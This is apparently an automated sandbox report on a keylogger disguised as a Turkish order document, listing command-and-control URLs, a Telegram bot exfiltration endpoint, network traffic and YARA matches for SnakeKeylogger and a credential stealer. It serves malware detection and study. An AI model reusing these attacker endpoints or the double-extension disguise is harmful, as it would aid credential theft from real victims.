                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1518653300.0000000002521000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3714163858.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49757 version: TLS 1.2
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_00CEE5A40_2_00CEE5A4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_04AA74900_2_04AA7490
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_04AA06900_2_04AA0690
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_04AA74800_2_04AA7480
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_04AA06880_2_04AA0688
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FC1475_2_012FC147
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FA0885_2_012FA088
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012F53625_2_012F5362
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FD2785_2_012FD278
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FC4685_2_012FC468
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FC7385_2_012FC738
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012F69A05_2_012F69A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FE9885_2_012FE988
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FCA085_2_012FCA08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FCCD85_2_012FCCD8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FCFA95_2_012FCFA9
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012F6FC85_2_012F6FC8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FE97B5_2_012FE97B
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012FF9795_2_012FF979
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012F29E05_2_012F29E0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_012F3E095_2_012F3E09
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_06C4AFD05_2_06C4AFD0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_06C4DE465_2_06C4DE46
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_06C4DE505_2_06C4DE50
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_06C44A005_2_06C44A00
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 1832
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1518104065.000000000093E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1522079412.0000000004EA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1524429389.0000000006BF6000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1518653300.0000000002574000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1518653300.00000000025C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1519490045.0000000003758000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3720441314.0000000007059000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeBinary or memory string: OriginalFilenameKxTQ.exe8 vs fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 6368, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
